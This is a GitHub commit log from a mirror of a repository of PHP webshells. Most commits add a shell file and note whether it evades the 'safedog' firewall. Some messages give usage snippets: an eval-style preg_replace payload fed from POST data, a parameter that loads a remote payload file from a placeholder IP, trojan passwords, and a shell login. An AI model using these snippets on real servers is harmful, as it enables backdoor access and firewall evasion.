1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
Commit Graph

194 Commits

Author SHA1 Message Date
tennc
43d9582172 Create php_webshell.py
create bypass safedog webshell  with python
from : https://github.com/pureqh/webshell
thanks to pureqh 👍
2020-09-05 17:44:37 +08:00
tennc
719eb9131d Create ass.php
请求时,设置Referer头,后面以”ass****”结尾即可,比如:Referer: http://www.target.com/ass.php。
在使用Cknife时,注意软件实现有缺陷,会从第二个”:”处截断,可改成Referer: http%3a//www.target.com/ass.php
from : http://alin.run/2020/08/04/php-webshell-bypass/
2020-09-03 21:00:49 +08:00
tennc
2bea3becb2 Create 2020-08-31-01.php
from: https://github.com/clm123321/tongda_oa_rce/blob/master/tongda.py#L145
2020-08-31 21:39:22 +08:00
tennc
e864fcd511 Create create_code_with_xor.py
create some code for php xor to bypass safedog
from : https://www.sqlsec.com/2020/07/shell.html#toc-heading-24
2020-08-30 14:05:29 +08:00
tennc
23aea8530d Create 2020.08.20.20.php
maybe bypass safedog
from : https://www.sqlsec.com/2020/07/shell.html#toc-heading-24
2020-08-21 19:52:22 +08:00
tennc
cbd7b8ef98 Create 2020.08.20.19.php
bypass by safedog
https://www.sqlsec.com/2020/07/shell.html
2020-08-20 13:09:52 +08:00
tennc
12ad35eb0f Create 2020.08.20.18.php
bypass safedog
https://www.sqlsec.com/2020/07/shell.html
2020-08-20 13:08:25 +08:00
tennc
0d1874b235 Create 2020.08.20.17.php
killed by safedog
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 13:07:32 +08:00
tennc
cd1e25025a Create 2020.08.20.16.php
from : https://www.sqlsec.com/2020/07/shell.html
killed by safedog
2020-08-20 13:03:10 +08:00
tennc
ecc1fb09ee Create 2020.08.20.15.php
use:
shell.php?e=mb_eregi_replace
post x=phpinfo();
2020-08-20 12:48:04 +08:00
tennc
6a9169da6b Create 2020.08.20.14.php 2020-08-20 12:40:40 +08:00
tennc
44282fe412 Create 2020.08.20.13.php
shell.php?e=preg_replace ==> preg_replace('|.*|e',$_POST['x'],'')
use:  post x=phpinfo();
from: https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:38:26 +08:00
tennc
aeb2db1e19 Create 2020.08.20.12.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:35:58 +08:00
tennc
f7c1551c7f Create 2020.08.20.11.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:34:54 +08:00
tennc
accce9acef Create 2020.08.20.10.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:34:25 +08:00
tennc
63217f585d Create 2020.08.20.09.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:33:34 +08:00
tennc
69b4a7b5bc Create 2020.08.20.08.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:32:56 +08:00
tennc
a700c2b3d8 Create 2020.08.20.07.php
from : https://www.sqlsec.com/2020/07/shell.html
killled by safedog
2020-08-20 12:32:12 +08:00
tennc
d5f61a9c5f Create 2020.08.20.06.php
from : https://www.sqlsec.com/2020/07/shell.html
killed by safedog
2020-08-20 12:31:23 +08:00
tennc
d8cdd62ab1 Create 2020.08.20.05.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:30:06 +08:00
tennc
223d57c52c Create 2020.08.20.04.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:29:26 +08:00
tennc
6759fd8dcc Create 2020.08.20.03.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:28:46 +08:00
tennc
51833ad9b6 Create 2020.08.20.02.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:27:40 +08:00
tennc
820aadc6a1 Create 2020.08.20.01.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:26:04 +08:00
tennc
67733cfcdc Create bypass-dog-2020-01-30.php
use: http://xxx.xxx.xx/xxx.php?nb=phpinfo()
form: WX公众号 “ 渗透云笔记” Sigsh
新年从过狗开始
2020-01-30 14:30:09 +08:00
tennc
c290a06bc9 Create php7.1_bypass.php
from : https://www.anquanke.com/post/id/193787
参数$b的前面加上“n"就成功绕过了,当然同理,你也可以在参数$b的前面加上"\"、"\t"、"\r"等等也是可以绕过的。
在参数$b的前面加上"\n",""、"\t"、"\r"等等也是可以绕过的。

木马密码:a
2019-12-06 18:33:51 +08:00
tennc
7f70bb9b88 add create b374k-php shell source code
create b374k-php shell source code
2019-11-27 09:06:00 +08:00
tennc
0add9c4465 Create test.php
from:https://github.com/tide-emergency/yingji/blob/master/%E6%9C%A8%E9%A9%AC%E5%90%8E%E9%97%A8/test.php
use:
http://xxx.xxx/plus/test.php?id=http://xx.x.xx.xx:xxx/s/admine21.txt
====>
optimized.php
2019-10-23 22:47:21 +08:00
tennc
f315423d0a Create 5678.php
from: https://github.com/tide-emergency/yingji/blob/master/%E6%9C%A8%E9%A9%AC%E5%90%8E%E9%97%A8/5678.php
2019-10-23 22:43:48 +08:00
tennc
d656fd3574 Create admine21_decode.php
from : https://github.com/tide-emergency/yingji/blob/master/%E6%9C%A8%E9%A9%AC%E5%90%8E%E9%97%A8/optimized.php
2019-10-23 22:41:42 +08:00
tennc
9494a1f9ae Update admine21.txt
decode password :admine21
2019-10-23 22:36:01 +08:00
tennc
4c6900196d Create admine21.txt
add admine21
2019-10-23 22:21:32 +08:00
tennc
3839a603ab Update bat_2.7.php
Login Account (Default)
Username : k4mpr3t
Password : k4mpr3t
Features
[0] File Manager
[1] Sec. Info
[2] Simply Database
[3] Interactive terminal
[4] PHP Reverse Back Connect
[5] Run PHP Code
[6] Custom Toolz
[7] Self Script Encryptor !
[8] Error Handler
[9] Themes
Self Script Encryptor
Usage : http://website.com/shell.php?x=self-encryptor&name=shell_encrypt.php
2019-06-09 01:14:37 +08:00
tennc
6533a69d93 Create bat_2.7.php
form @k4mpr3t https://github.com/k4mpr3t/b4tm4n
author: k4mpr3t 👍
2019-06-09 01:12:30 +08:00
Levi Li
ddb43c6b88 Added B4TM4N ~ PHP WEBSHELL
From:https://github.com/k4mpr3t/b4tm4n
2018-12-20 15:48:19 +08:00
Levi Li
7da43f30de webshell-detect-bypass
from: https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/php
author: Build By LandGrey
2018-12-20 11:48:35 +08:00
Levi Li
32be5d26bf Add files via upload
From:https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/php
Author:Build by LandGrey
2018-12-20 11:34:55 +08:00
tennc
a0a4b15bdf Update 404.php.txt
del backdoor
2018-08-27 12:56:34 +08:00
tennc
c8ee47f1c4 Create array_intersect_uassoc-filename-last-char-must-be-s.php
from : https://github.com/LandGrey
author :  LandGrey
2018-06-02 15:22:09 +08:00
tennc
dc7dc8e614 Create gzismexv.php
from : https://www.v2ex.com/t/415786
2017-12-19 14:24:14 +08:00
tennc
e0fabd8d29 Create general.php
from : https://www.v2ex.com/t/415786
2017-12-19 14:23:09 +08:00
tennc
a0ca39ab62 Create error52.php
from : https://www.v2ex.com/t/415786
2017-12-19 14:22:39 +08:00
tennc
95b44594fa Create cvwfzthj.php
from : https://www.v2ex.com/t/415786
2017-12-19 14:22:10 +08:00
tennc
179887ea97 Create job.php.txt
from : https://www.v2ex.com/t/415786
2017-12-19 14:21:27 +08:00
tennc
e91bee4b7e Create wloymzuk.php
from : https://www.v2ex.com/t/415786
2017-12-19 14:20:41 +08:00
tennc
b0b14d1271 Create session91.php
from : https://www.v2ex.com/t/415786
2017-12-19 14:19:57 +08:00
tennc
7c1bd8d461 Create mailer.php 2017-09-14 15:39:54 +08:00
tennc
230a963cc3 Create bh.php 2017-09-14 15:39:15 +08:00
tennc
4978e8fe45 Create bukapalapak.php 2017-09-14 15:38:20 +08:00
tennc
32bc0ff13e Create gamestopceker.php 2017-09-14 15:37:39 +08:00